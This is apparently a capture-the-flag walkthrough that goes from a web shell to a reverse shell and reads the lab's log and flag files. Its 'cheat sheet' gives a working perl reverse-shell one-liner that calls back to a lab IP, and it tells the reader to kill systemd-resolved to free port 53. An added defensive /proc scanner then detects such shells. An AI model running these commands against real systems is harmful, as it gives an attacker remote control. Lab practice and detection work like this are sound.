First Contact

Get a reverse shell

We have identified a potential attack surface that lets us execute PHP and shell commands. From the web shell we can launch a reverse shell to get an interactive shell on the machine.

Uploading a PHP reverse shell

For the PHP reverse shell, we'll be using Pentest Monkey's reverse shell, found here or in Kali under /usr/share/webshells/php/php-reverse-shell.php

  1. Modify the reverse shell to use your tun0 IP address and port.

  2. Paste the PHP code into the web shell. Note: the first line <?php and the last line ?> need to be removed.

  3. Start a netcat listener on port 53.

  4. Execute the reverse shell.

Problem with the netcat listener on port 53

Kill the systemd-resolv process and start the netcat listener again

Execute the reverse shell:

To answer the questions and find the flag, I need to focus on the logs

Searching for logs: cd /var/log

content of /var/log
content of login.log and flag.txt

Getting the root flag

content of rot.txt

Additional way to get a reverse shell

Reverse shell cheat sheet
perl -e 'use Socket;$i="10.50.133.33";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Execute perl reverse shell
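
Seen from the defending side, the perl one-liner above leaves /bin/sh with stdin, stdout and stderr all duplicated from one TCP socket. The check below is an added example (not part of the original write-up) that looks for that state under /proc; the function name find_socket_shells and the list of shell names are assumptions.

```shell
#!/bin/sh
# Added example: flag shell processes whose fds 0, 1 and 2 all point at the
# same socket, which is what open(STDIN,">&S") / open(STDOUT,">&S") /
# open(STDERR,">&S") followed by exec("/bin/sh -i") produces.

# Print "PID COMM SOCKET" for every matching process.
# $1 is the proc root to scan (default /proc), so a copied or test tree works too.
# The body runs in a subshell so its variables do not leak into the caller.
find_socket_shells() (
    proc_root=${1:-/proc}
    for dir in "$proc_root"/[0-9]*; do
        [ -d "$dir/fd" ] || continue
        pid=${dir##*/}
        comm=$(cat "$dir/comm" 2>/dev/null) || continue

        # Only interactive-shell binaries are of interest (assumed list).
        case $comm in
            sh|bash|dash|zsh|ksh) ;;
            *) continue ;;
        esac

        # Unreadable or missing descriptors: skip the process.
        fd0=$(readlink "$dir/fd/0" 2>/dev/null) || continue
        fd1=$(readlink "$dir/fd/1" 2>/dev/null) || continue
        fd2=$(readlink "$dir/fd/2" 2>/dev/null) || continue

        # A terminal or pipe on stdin is normal; a socket is not.
        case $fd0 in
            socket:*) ;;
            *) continue ;;
        esac

        # All three descriptors must be the very same socket inode.
        if [ "$fd0" = "$fd1" ] && [ "$fd1" = "$fd2" ]; then
            printf '%s %s %s\n' "$pid" "$comm" "$fd0"
        fi
    done
)

# Scan the live system when the script is run as-is.
find_socket_shells /proc
```

Reading the fd links of other users' processes requires root. The socket inode in the output can be matched against `ss -tnpe` to find the remote address.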

Questions
